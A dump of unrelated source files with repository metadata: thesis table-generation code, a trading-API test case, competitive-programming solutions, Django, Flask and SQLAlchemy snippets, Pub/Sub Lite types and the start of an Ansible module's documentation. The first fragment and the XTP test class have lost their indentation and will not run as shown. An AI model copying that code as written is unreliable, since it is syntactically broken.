xtype_table_data = [header_row]
for t1 in all_types_sorted:
table_row = [pretty_labels[t1]]
for t2 in all_types_sorted:
if (t1 <= t2):
cell = cross_types_matrix[(t1, t2)]
else:
cell = "-"
table_row.append(cell)
xtype_table_data.append(table_row)
matrix2latex.matrix2latex(xtype_table_data,
filename=phd_output_dir+"ch7_table_gen_intra_xtype_cluster",
caption="Intra-Cluster Datum Pairs by Type (Positive Cases).",
alignment='r ' * len(header_row))
pair_table_data.append(
("Total intra-cluster (positive) datum pairs",
sum(count for count in cross_types_matrix.values())))
inter_xtype_table_data = [header_row]
for t1 in all_types_sorted:
table_row = [pretty_labels[t1]]
for t2 in all_types_sorted:
if (t1 <= t2):
cell = inter_cross_types_matrix[(t1, t2)]
else:
cell = "-"
table_row.append(cell)
inter_xtype_table_data.append(table_row)
matrix2latex.matrix2latex(inter_xtype_table_data,
filename=phd_output_dir+"ch7_table_gen_inter_xtype_cluster",
caption="Inter-Cluster Datum Pairs by Type (Negative Cases).",
alignment='r ' * len(header_row))
pair_table_data.append(
("Total inter-cluster (negative) datum pairs",
sum(count for count in inter_cross_types_matrix.values())))
inter_xtype_table_data = [header_row]
for t1 in all_types_sorted:
table_row = [pretty_labels[t1]]
for t2 in all_types_sorted:
if (t1 <= t2):
cell = inter_cross_types_matrix[(t1, t2)] + cross_types_matrix[(t1, t2)]
else:
cell = "-"
table_row.append(cell)
inter_xtype_table_data.append(table_row)
matrix2latex.matrix2latex(inter_xtype_table_data,
filename=phd_output_dir+"ch7_table_gen_all_xtype_cluster",
caption="Cluster Datum Pairs by Type (All Cases).",
alignment='r ' * len(header_row))
pair_table_data.append(
("\midrule Total cluster datum pairs",
sum(count for count in inter_cross_types_matrix.values())
+ sum(count for count in cross_types_matrix.values())))
# Generate Overview Stats Table
# ====
# In[13]:
t = matrix2latex.matrix2latex(table_data, filename=phd_output_dir+"ch5_table_gen_gt_summary", caption="Summary of participants' ground truth data.", alignment='r r')
print(t)
# In[14]:
t = matrix2latex.matrix2latex(pair_table_data,
filename=phd_output_dir+'ch7_table_pair_summary',
caption='Summary of Ground Truth Datum Pairs.',
alignment='r r')
print(t)
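

def _counter_histogram_demo():
    """Illustrative, self-contained sketch (not part of the thesis pipeline)
    of the Counter-to-bar-data idiom used twice in do_descriptiveStats()."""
    from collections import Counter
    sizes = [1, 2, 2, 5]
    freqs = [0] * max(sizes)
    for value, count in Counter(sizes).items():
        freqs[value - 1] = count
    return freqs  # -> [1, 2, 0, 0, 1]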
| [
"[email protected]"
]
| |
caa434acc7d304b0c285e9a771010088d560dbc5 | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/ReverseRepo/YW_NHG_SHHG_019_GC003.py | 9f23f2cae281cc74a7cff9d8df2f7abdba2b90e2 | []
| no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,025 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_NHG_SHHG_019_GC003(xtp_test_case):
# YW_NHG_SHHG_019_GC003
def test_YW_NHG_SHHG_019_GC003(self):
        title = '上海逆回购--数量(等于100万张)-3天'  # Shanghai reverse repo -- quantity equal to 1,000,000 -- 3 days (GC003)
        # Define the expected values for this test case
        # Expected status: initial / unfilled / partially filled / fully filled / partial-cancel reported /
        # partially cancelled / reported pending cancel / cancelled / invalid order / cancel-invalidated / internal cancel
        # xtp_ID and cancel_xtpID default to 0 and need not be changed
case_goal = {
'期望状态': '全成',
'errorID': 0,
'errorMSG': '',
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
        # Define the order parameter information ------------------------------------------
        # Parameters: ticker, market, security type, security status, trading status, side (B=buy, S=sell), expected status, Api
stkparm = QueryStkPriceQty('204003', '1', '12', '2', '0', 'S', case_goal['期望状态'], Api)
        # If fetching the order parameters fails, the test case fails
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
                '测试错误原因': 'Failed to fetch order parameters, ' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_REPO'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
'price': stkparm['随机中间价'],
'quantity': 1000000,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
        logger.warning('Execution result: ' + str(rs['用例测试结果']) + ','
                       + str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
]
| |
8a2eb7cfab390a2f709d7eb3419c08fa0e6dd095 | 0eb599c3bbfa6e5b31516913b88cc9db3a1311ce | /ABC_6q/abc169f.py | ad9eed03c6ee61e3f204ed1ab80452f68d22e136 | []
| no_license | Linus-MK/AtCoder | 5b84dc88c2d2773d0f97ed18265d303290da7879 | a587e89a9e0c2ab4d36b09176bcc95e901e14326 | refs/heads/master | 2022-11-25T05:37:12.148722 | 2022-11-17T16:04:10 | 2022-11-17T16:04:10 | 169,840,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | n, s = list(map(int, input().split()))
nums = list(map(int, input().split()))
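# dp[i][summ]: weighted count of subsets U of the first i numbers with
# sum(U) == summ, where each number left out of U contributes a factor of 2
# (it may or may not belong to the enclosing subset T in the original
# problem) -- hence the 2 * dp[i][summ] term in the transition below.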
dp = [[0 for i in range(s+1)] for j in range(n+1)]
mod = 998244353
dp[0][0] = 1
for i in range(n):
for summ in range(s+1):
if summ - nums[i] >= 0:
dp[i+1][summ] = (2 * dp[i][summ] + dp[i][summ - nums[i]]) % mod
else:
dp[i+1][summ] = (2 * dp[i][summ]) % mod
# print(dp)
print(dp[n][s] % mod) | [
"[email protected]"
]
| |
a13a4d56104bd687f7c9c1b4efa6c7b4fb4ee4e4 | 2020c9c6958d9cc338b72f62e24d9ad30c1a8cad | /python/0101.symmetric-tree/symmetric-tree.py | 8cf51e4680551dbd6d293ddb24a39ee7fa4c43f7 | []
| no_license | ysmintor/leetcode | b2d87db932b77e72504ffa07d7bf1b0d8c09b661 | 434889037fe3e405a8cbc71cd822eb1bda9aa606 | refs/heads/master | 2020-05-30T21:03:03.886279 | 2019-10-31T08:46:23 | 2019-10-31T09:02:24 | 189,963,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | class Solution:
"""
recursive solution
"""
def isSymmetric(self, root: TreeNode) -> bool:
if root == None:
return True
return self.isMirror(root.left, root.right)
def isMirror(self, t1: TreeNode, t2:TreeNode ) -> bool:
if t1 == None and t2 == None:
return True
if t1 == None or t2 == None:
return False
return (t1.val == t2.val) \
and self.isMirror(t1.right, t2.left) \
and self.isMirror(t1.left, t2.right)
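

# Illustrative iterative variant (not in the original submission): the same
# mirror check with an explicit stack, avoiding Python's recursion limit.
class SolutionIterative:
    def isSymmetric(self, root: TreeNode) -> bool:
        stack = [(root, root)]
        while stack:
            t1, t2 = stack.pop()
            if t1 is None and t2 is None:
                continue
            if t1 is None or t2 is None or t1.val != t2.val:
                return False
            stack.append((t1.left, t2.right))
            stack.append((t1.right, t2.left))
        return True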
| [
"[email protected]"
]
| |
30dea1db000cc40ea6b735e332cf15c6d2f4bace | 6413fe58b04ac2a7efe1e56050ad42d0e688adc6 | /tempenv/lib/python3.7/site-packages/plotly/graph_objs/layout/ternary/aaxis/__init__.py | 797a36fb417fb76496384beb1c5bdf6c09acee6b | [
"MIT"
]
| permissive | tytechortz/Denver_temperature | 7f91e0ac649f9584147d59193568f6ec7efe3a77 | 9d9ea31cd7ec003e8431dcbb10a3320be272996d | refs/heads/master | 2022-12-09T06:22:14.963463 | 2019-10-09T16:30:52 | 2019-10-09T16:30:52 | 170,581,559 | 1 | 0 | MIT | 2022-06-21T23:04:21 | 2019-02-13T21:22:53 | Python | UTF-8 | Python | false | false | 159 | py | from ._title import Title
from plotly.graph_objs.layout.ternary.aaxis import title
from ._tickformatstop import Tickformatstop
from ._tickfont import Tickfont
| [
"[email protected]"
]
| |
f86011e920527fade4c0b894ea3f406f6ca86766 | 9b20743ec6cd28d749a4323dcbadb1a0cffb281b | /10_Imbalanced_Classification_with_Python/13/03_balanced_decision_tree.py | 723ce924b4ed4330ac7a194e25defea465a60bfa | []
| no_license | jggrimesdc-zz/MachineLearningExercises | 6e1c7e1f95399e69bba95cdfe17c4f8d8c90d178 | ee265f1c6029c91daff172b3e7c1a96177646bc5 | refs/heads/master | 2023-03-07T19:30:26.691659 | 2021-02-19T08:00:49 | 2021-02-19T08:00:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | # decision tree with class weight on an imbalanced classification dataset
from numpy import mean
from sklearn.datasets import make_classification
from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.model_selection import cross_val_score
from sklearn.tree import DecisionTreeClassifier
# generate dataset
X, y = make_classification(n_samples=10000, n_features=2, n_redundant=0, n_clusters_per_class=1, weights=[0.99],
flip_y=0, random_state=3)
# define model
model = DecisionTreeClassifier(class_weight='balanced')
# define evaluation procedure
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)
# evaluate model
scores = cross_val_score(model, X, y, scoring='roc_auc', cv=cv, n_jobs=-1)
# summarize performance
print('Mean ROC AUC: %.3f' % mean(scores))
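# Illustrative follow-up (an assumption, not part of the original lesson):
# the same evaluation with an explicit minority-class weighting instead of
# the 'balanced' heuristic.
weighted_model = DecisionTreeClassifier(class_weight={0: 1, 1: 100})
weighted_scores = cross_val_score(weighted_model, X, y, scoring='roc_auc', cv=cv, n_jobs=-1)
print('Mean ROC AUC (1:100 weights): %.3f' % mean(weighted_scores))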
| [
"[email protected]"
]
| |
11b41900468b82ef7940e02e889324872ea46a3f | f44a1cbb48952ce466310859234f73cb2769ef2c | /backend/mobile_5_oct_1723/wsgi.py | b09e1b28f4e63a9fbc6f3a96c61672bb2582051a | []
| no_license | crowdbotics-apps/mobile-5-oct-1723 | ea496e71e634a67dccfb39019dd50d9351247943 | 94ddd875afaa86d5810d24644a35e23db6b231d1 | refs/heads/master | 2022-12-25T10:00:21.575101 | 2020-10-05T05:14:39 | 2020-10-05T05:14:39 | 301,300,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | """
WSGI config for mobile_5_oct_1723 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mobile_5_oct_1723.settings')
application = get_wsgi_application()
| [
"[email protected]"
]
| |
3b43b227b7faa549f674979711bdaec0a30fe8d9 | aaf7e8f9ec5856241930c98167071e424967b486 | /src/lib/glfs-web/app/snmp.py | f9fa73d88593c3e76f64161535626ffe193a8b58 | []
| no_license | ShenDezhou/PyCRM | e32826d143598227910c6a13bbc70140ec7f56d2 | 36b9411d9d5372b59fed00afdbc74607fb010df9 | refs/heads/master | 2022-02-10T02:29:45.876818 | 2018-06-17T10:09:43 | 2018-06-17T10:09:43 | 72,261,079 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | import netsnmp
def snmp_query(oid, dest_host, community,version=2):
varbind = netsnmp.Varbind(oid)
result = netsnmp.snmpwalk(varbind, Version=version,
DestHost=dest_host, Community=community)
return result
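

# Illustrative call (placeholder host/community values; requires the net-snmp
# Python bindings at runtime). '.1.3.6.1.2.1.2.2.1.2' is the standard ifDescr OID.
if __name__ == '__main__':
    interface_names = snmp_query('.1.3.6.1.2.1.2.2.1.2', '192.0.2.1', 'public')
    print(interface_names)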
| [
"[email protected]"
]
| |
fd0a6ba9360c28449fd6b0848a7aecadab2791fb | 1e998b8aa40e29dd21e97b1071fc5dc46d4746c2 | /example/example/urls.py | 3f3d7176338ff3f5b14369d3c51078945a69d240 | [
"MIT"
]
| permissive | PragmaticMates/django-templates-i18n | 61786d0e3daf304316609fbf17f87f27457fdaae | 0dac1b8da498dc414d4836c1cf6cb82cb1597c26 | refs/heads/master | 2016-09-06T15:47:46.161242 | 2014-09-26T12:14:02 | 2014-09-26T12:14:02 | 22,213,677 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | from django.conf.urls import include, url
from django.conf.urls.i18n import i18n_patterns
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
from views import HomeView, MyView
admin.autodiscover()
urlpatterns = i18n_patterns('',
# Uncomment the admin/doc line below to enable admin documentation:
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
# Examples:
url(r'^my-view/$', MyView.as_view(), name='my_view'),
url(r'^$', HomeView.as_view(), name='home'),
)
| [
"[email protected]"
]
| |
ecae1e41c1a4dbea1e9f916e518c7a30df863ebe | bc9f66258575dd5c8f36f5ad3d9dfdcb3670897d | /lib/third_party/google/cloud/pubsublite_v1/types/topic_stats.py | 1ad03e069c7d8a1f576f2e229fdb25414030148e | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | google-cloud-sdk-unofficial/google-cloud-sdk | 05fbb473d629195f25887fc5bfaa712f2cbc0a24 | 392abf004b16203030e6efd2f0af24db7c8d669e | refs/heads/master | 2023-08-31T05:40:41.317697 | 2023-08-23T18:23:16 | 2023-08-23T18:23:16 | 335,182,594 | 9 | 2 | NOASSERTION | 2022-10-29T20:49:13 | 2021-02-02T05:47:30 | Python | UTF-8 | Python | false | false | 5,658 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.pubsublite_v1.types import common
from cloudsdk.google.protobuf import timestamp_pb2 # type: ignore
__protobuf__ = proto.module(
package="google.cloud.pubsublite.v1",
manifest={
"ComputeMessageStatsRequest",
"ComputeMessageStatsResponse",
"ComputeHeadCursorRequest",
"ComputeHeadCursorResponse",
"ComputeTimeCursorRequest",
"ComputeTimeCursorResponse",
},
)
class ComputeMessageStatsRequest(proto.Message):
r"""Compute statistics about a range of messages in a given topic
and partition.
Attributes:
topic (str):
Required. The topic for which we should
compute message stats.
partition (int):
Required. The partition for which we should
compute message stats.
start_cursor (google.cloud.pubsublite_v1.types.Cursor):
The inclusive start of the range.
end_cursor (google.cloud.pubsublite_v1.types.Cursor):
The exclusive end of the range. The range is empty if
end_cursor <= start_cursor. Specifying a start_cursor before
the first message and an end_cursor after the last message
will retrieve all messages.
"""
topic = proto.Field(proto.STRING, number=1,)
partition = proto.Field(proto.INT64, number=2,)
start_cursor = proto.Field(proto.MESSAGE, number=3, message=common.Cursor,)
end_cursor = proto.Field(proto.MESSAGE, number=4, message=common.Cursor,)
class ComputeMessageStatsResponse(proto.Message):
r"""Response containing stats for messages in the requested topic
and partition.
Attributes:
message_count (int):
The count of messages.
message_bytes (int):
The number of quota bytes accounted to these
messages.
minimum_publish_time (google.protobuf.timestamp_pb2.Timestamp):
The minimum publish timestamp across these
messages. Note that publish timestamps within a
partition are not guaranteed to be
non-decreasing. The timestamp will be unset if
there are no messages.
minimum_event_time (google.protobuf.timestamp_pb2.Timestamp):
The minimum event timestamp across these
messages. For the purposes of this computation,
if a message does not have an event time, we use
the publish time. The timestamp will be unset if
there are no messages.
"""
message_count = proto.Field(proto.INT64, number=1,)
message_bytes = proto.Field(proto.INT64, number=2,)
minimum_publish_time = proto.Field(
proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,
)
minimum_event_time = proto.Field(
proto.MESSAGE, number=4, message=timestamp_pb2.Timestamp,
)
class ComputeHeadCursorRequest(proto.Message):
r"""Compute the current head cursor for a partition.
Attributes:
topic (str):
Required. The topic for which we should
compute the head cursor.
partition (int):
Required. The partition for which we should
compute the head cursor.
"""
topic = proto.Field(proto.STRING, number=1,)
partition = proto.Field(proto.INT64, number=2,)
class ComputeHeadCursorResponse(proto.Message):
r"""Response containing the head cursor for the requested topic
and partition.
Attributes:
head_cursor (google.cloud.pubsublite_v1.types.Cursor):
The head cursor.
"""
head_cursor = proto.Field(proto.MESSAGE, number=1, message=common.Cursor,)
class ComputeTimeCursorRequest(proto.Message):
r"""Compute the corresponding cursor for a publish or event time
in a topic partition.
Attributes:
topic (str):
Required. The topic for which we should
compute the cursor.
partition (int):
Required. The partition for which we should
compute the cursor.
target (google.cloud.pubsublite_v1.types.TimeTarget):
Required. The target publish or event time.
Specifying a future time will return an unset
cursor.
"""
topic = proto.Field(proto.STRING, number=1,)
partition = proto.Field(proto.INT64, number=2,)
target = proto.Field(proto.MESSAGE, number=3, message=common.TimeTarget,)
class ComputeTimeCursorResponse(proto.Message):
r"""Response containing the cursor corresponding to a publish or
event time in a topic partition.
Attributes:
cursor (google.cloud.pubsublite_v1.types.Cursor):
If present, the cursor references the first message with
time greater than or equal to the specified target time. If
such a message cannot be found, the cursor will be unset
(i.e. ``cursor`` is not present).
"""
cursor = proto.Field(proto.MESSAGE, number=1, message=common.Cursor,)
__all__ = tuple(sorted(__protobuf__.manifest))
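
# Illustrative construction sketch (the resource names below are placeholders,
# not part of the generated module):
#
#   request = ComputeMessageStatsRequest(
#       topic="projects/PROJECT_NUMBER/locations/us-central1-a/topics/my-topic",
#       partition=0,
#       start_cursor=common.Cursor(offset=0),
#   )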
| [
"[email protected]"
]
| |
996e69c5148b5df26512a00ee71bb6d5b3048f9e | b805ded84cff8878ae70d772e50cface0c3aa45c | /proxy_pool/proxy_pool/settings.py | b6ecc4f6634f97f0ee761b1fd95cd587f2e5db95 | []
| no_license | CNZedChou/python-web-crawl-learning | 74f014fe95797d3f534e373de8451d2dfcc0600c | 5edf8f53e1bb9df3661ec007bb4d7f0ba04ab013 | refs/heads/master | 2022-11-10T08:26:53.275547 | 2020-07-06T02:33:03 | 2020-07-06T02:33:03 | 275,563,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # !/usr/bin/python3
# -*- coding: utf-8 -*-
"""
@Author : Zed
@Version : V1.0.0
------------------------------------
@File : settings.py
@Description  : Redis password; an empty string means no password
@CreateTime : 2020-6-30 11:22
------------------------------------
@ModifyTime :
"""
PASSWORD = ''
HOST = 'localhost'
PORT = '6379'
# Name of the proxy pool key in Redis
PROXYPOOL = 'proxies'
TEST_API = 'https://www.baidu.com'
TEST_HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36',
}
# Interval (seconds) between validation passes over the pool
CYCLE_VALID_TIME = 60
# Minimum number of proxies kept in the pool
LOWER_NUM = 10
# Maximum number of proxies kept in the pool
UPPER_NUM = 100
# Pool check interval (seconds)
CHECK_POOL_CYCLE = 60 | [
"[email protected]"
]
| |
15b0120a6df7223e01d2f3afa3879e7993d63438 | 174f848b62fb2ea0a1605e1aab70085ffd27ce50 | /beginning/age.py | 0540185272594c22e444e0b66ab14903a4e2d11f | []
| no_license | unet-echelon/by_of_python_lesson | cd71bd3890d42d49cc128ec1730371bf1b64dbfa | c6c5c917414ac98b6dfb582dc06c26d31ea5b30c | refs/heads/master | 2021-07-11T07:16:20.243347 | 2020-09-14T12:39:13 | 2020-09-14T12:39:13 | 201,041,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | #!/usr/bin/env python3
age = 26
name = 'kernel'
print('{0} is {1} years old'.format(name, age))
print('Why is {0} playing with that Python?'.format(name)) | [
"[email protected]"
]
| |
593eff5c51f3663c6b63401945d8e42c0bd744e9 | 1e9de96619592ed25c3a4ff57b6a78717882a709 | /app/resources/database.py | 970e203f904febf5289d936283299a350e6346e4 | []
| no_license | AntoineDao/example-service | 503d08788f7e557ee12f72fabfa537136b927d3f | 8b088ecd0a67642737a883d7f035722a8cd7a0b4 | refs/heads/master | 2020-04-22T07:13:59.199629 | 2019-02-07T17:36:17 | 2019-02-07T17:36:17 | 170,213,289 | 0 | 0 | null | 2019-02-11T22:32:16 | 2019-02-11T22:32:16 | null | UTF-8 | Python | false | false | 988 | py | import os
import datetime
import uuid
from flask_sqlalchemy import SQLAlchemy
import app
db = SQLAlchemy()
class Example(db.Model):
""" Example Model for storing example related details """
__tablename__ = "example"
    id = db.Column(db.String(), primary_key=True, default=lambda: str(uuid.uuid4()))  # callable, so each row gets a fresh UUID
email = db.Column(db.String(255), unique=True, nullable=False)
    registered_on = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)  # pass the callable, not an import-time value
admin = db.Column(db.Boolean, nullable=False, default=False)
username = db.Column(db.String(50), unique=True)
password_hash = db.Column(db.String(100))
test = db.Column(db.String(100))
def __repr__(self):
return "<User '{}'>".format(self.username)
@classmethod
def from_dict(cls, data):
new = cls(
id=data.get('id'),
email=data.get('email'),
admin=data.get('admin'),
username=data.get('username')
)
return new
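

# Illustrative usage sketch (assumes a Flask app context with this `db` bound;
# values are placeholders):
#
#   example = Example.from_dict({'email': '[email protected]', 'username': 'demo'})
#   db.session.add(example)
#   db.session.commit()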
| [
"[email protected]"
]
| |
c58f04c352758ec38036a3158f57cde81fbbd04f | 3879d1ca43c573c209f962182cd1e7f7fe978fbf | /leetcode/1973. Count Nodes Equal to Sum of Descendants/1973.py | 0b8f98e6fa4a8d999bcefc23edcbc239a22b78c5 | []
| no_license | DoctorLai/ACM | 34a5600a5adf22660c5d81b2d8b7a358be537ecf | aefa170f74c55c1230eb6f352770512b1e3f469e | refs/heads/master | 2023-09-01T02:13:01.604508 | 2023-08-31T15:42:07 | 2023-08-31T15:42:07 | 146,173,024 | 62 | 18 | null | 2020-10-11T13:19:57 | 2018-08-26T11:00:36 | C++ | UTF-8 | Python | false | false | 864 | py | # https://helloacm.com/teaching-kids-programming-count-nodes-equal-to-sum-of-descendants-recursive-depth-first-search-algorithm/
# https://leetcode.com/problems/count-nodes-equal-to-sum-of-descendants/
# MEDIUM, DFS, RECURSION
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def equalToDescendants(self, root: Optional[TreeNode]) -> int:
self.ans = 0
def dfs(root):
if not root:
return 0
lsum = dfs(root.left)
rsum = dfs(root.right)
if lsum + rsum == root.val:
self.ans += 1
return lsum + rsum + root.val
dfs(root)
return self.ans
| [
"[email protected]"
]
| |
0b205c12342378f7ce7b47dbe339627f706f8e2f | dd73faa1c747089c44dbe85e081de5a089046329 | /api_app/views/index_view.py | afa13a27813919ffbd4ba28140a04fb8d96188ab | []
| no_license | spaun299/api_tv_web | 34aaa6da5fc0f3154a5830953ec8e9ee90d1a3b0 | a19c0079e06a7c823236fda5ffe9d1e46a5e829d | refs/heads/master | 2021-01-10T03:39:25.309627 | 2016-02-12T10:26:34 | 2016-02-12T10:26:34 | 51,149,276 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from ..urls.blueprints import index_bp
from flask import render_template, g
from ..constants.constants import ACTIVE_PAGES
@index_bp.route('/')
@index_bp.route('/index')
def index():
return render_template('index.html', active_page=ACTIVE_PAGES['main'])
| [
"[email protected]"
]
| |
afc009bcd6b0b1e4386fb982e3e8419cfdd0b9d3 | eacff46eda2c6b509449979a16002b96d4645d8e | /Collections-a-installer/community-general-2.4.0/plugins/modules/cloud/centurylink/clc_server.py | 4e02421892d88000bc4739d6fdde7946a0d09ad2 | [
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later"
]
| permissive | d-amien-b/simple-getwordpress | 5e6d4d15d5f87124ab591e46b63fec552998fdc3 | da90d515a0aa837b633d50db4d91d22b031c04a2 | refs/heads/master | 2023-04-08T22:13:37.347545 | 2021-04-06T09:25:51 | 2021-04-06T09:25:51 | 351,698,069 | 0 | 0 | MIT | 2021-03-31T16:16:45 | 2021-03-26T07:30:00 | HTML | UTF-8 | Python | false | false | 56,728 | py | #!/usr/bin/python
#
# Copyright (c) 2015 CenturyLink
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
module: clc_server
short_description: Create, Delete, Start and Stop servers in CenturyLink Cloud.
description:
- An Ansible module to Create, Delete, Start and Stop servers in CenturyLink Cloud.
options:
additional_disks:
description:
- The list of additional disks for the server
type: list
elements: dict
default: []
add_public_ip:
description:
- Whether to add a public ip to the server
type: bool
default: 'no'
alias:
description:
- The account alias to provision the servers under.
type: str
anti_affinity_policy_id:
description:
- The anti-affinity policy to assign to the server. This is mutually exclusive with 'anti_affinity_policy_name'.
type: str
anti_affinity_policy_name:
description:
- The anti-affinity policy to assign to the server. This is mutually exclusive with 'anti_affinity_policy_id'.
type: str
alert_policy_id:
description:
- The alert policy to assign to the server. This is mutually exclusive with 'alert_policy_name'.
type: str
alert_policy_name:
description:
- The alert policy to assign to the server. This is mutually exclusive with 'alert_policy_id'.
type: str
count:
description:
- The number of servers to build (mutually exclusive with exact_count)
default: 1
type: int
count_group:
description:
      - Required when exact_count is specified. The Server Group used to determine how many servers to deploy.
type: str
cpu:
description:
- How many CPUs to provision on the server
default: 1
type: int
cpu_autoscale_policy_id:
description:
- The autoscale policy to assign to the server.
type: str
custom_fields:
description:
- The list of custom fields to set on the server.
type: list
default: []
elements: dict
description:
description:
- The description to set for the server.
type: str
exact_count:
description:
      - Run in idempotent mode. Will ensure that this exact number of servers is running in the provided group,
creating and deleting them to reach that count. Requires count_group to be set.
type: int
group:
description:
- The Server Group to create servers under.
type: str
default: 'Default Group'
ip_address:
description:
- The IP Address for the server. One is assigned if not provided.
type: str
location:
description:
- The Datacenter to create servers in.
type: str
managed_os:
description:
- Whether to create the server as 'Managed' or not.
type: bool
default: 'no'
required: False
memory:
description:
- Memory in GB.
type: int
default: 1
name:
description:
- A 1 to 6 character identifier to use for the server. This is required when state is 'present'
type: str
network_id:
description:
- The network UUID on which to create servers.
type: str
packages:
description:
- The list of blue print packages to run on the server after its created.
type: list
elements: dict
default: []
password:
description:
- Password for the administrator / root user
type: str
primary_dns:
description:
- Primary DNS used by the server.
type: str
public_ip_protocol:
description:
- The protocol to use for the public ip if add_public_ip is set to True.
type: str
default: 'TCP'
choices: ['TCP', 'UDP', 'ICMP']
public_ip_ports:
description:
- A list of ports to allow on the firewall to the servers public ip, if add_public_ip is set to True.
type: list
elements: dict
default: []
secondary_dns:
description:
- Secondary DNS used by the server.
type: str
server_ids:
description:
- Required for started, stopped, and absent states.
A list of server Ids to insure are started, stopped, or absent.
type: list
default: []
elements: str
source_server_password:
description:
- The password for the source server if a clone is specified.
type: str
state:
description:
      - The state to ensure that the provided resources are in.
type: str
default: 'present'
choices: ['present', 'absent', 'started', 'stopped']
storage_type:
description:
- The type of storage to attach to the server.
type: str
default: 'standard'
choices: ['standard', 'hyperscale']
template:
description:
- The template to use for server creation. Will search for a template if a partial string is provided.
This is required when state is 'present'
type: str
ttl:
description:
- The time to live for the server in seconds. The server will be deleted when this time expires.
type: str
type:
description:
- The type of server to create.
type: str
default: 'standard'
choices: ['standard', 'hyperscale', 'bareMetal']
configuration_id:
description:
- Only required for bare metal servers.
Specifies the identifier for the specific configuration type of bare metal server to deploy.
type: str
os_type:
description:
- Only required for bare metal servers.
Specifies the OS to provision with the bare metal server.
type: str
choices: ['redHat6_64Bit', 'centOS6_64Bit', 'windows2012R2Standard_64Bit', 'ubuntu14_64Bit']
wait:
description:
- Whether to wait for the provisioning tasks to finish before returning.
type: bool
default: 'yes'
requirements:
- python = 2.7
- requests >= 2.5.0
- clc-sdk
author: "CLC Runner (@clc-runner)"
notes:
  - To use this module, it is required to set the below environment variables, which enable access to the
Centurylink Cloud
- CLC_V2_API_USERNAME, the account login id for the centurylink cloud
- CLC_V2_API_PASSWORD, the account password for the centurylink cloud
- Alternatively, the module accepts the API token and account alias. The API token can be generated using the
CLC account login and password via the HTTP api call @ https://api.ctl.io/v2/authentication/login
- CLC_V2_API_TOKEN, the API token generated from https://api.ctl.io/v2/authentication/login
- CLC_ACCT_ALIAS, the account alias associated with the centurylink cloud
- Users can set CLC_V2_API_URL to specify an endpoint for pointing to a different CLC environment.
'''
EXAMPLES = '''
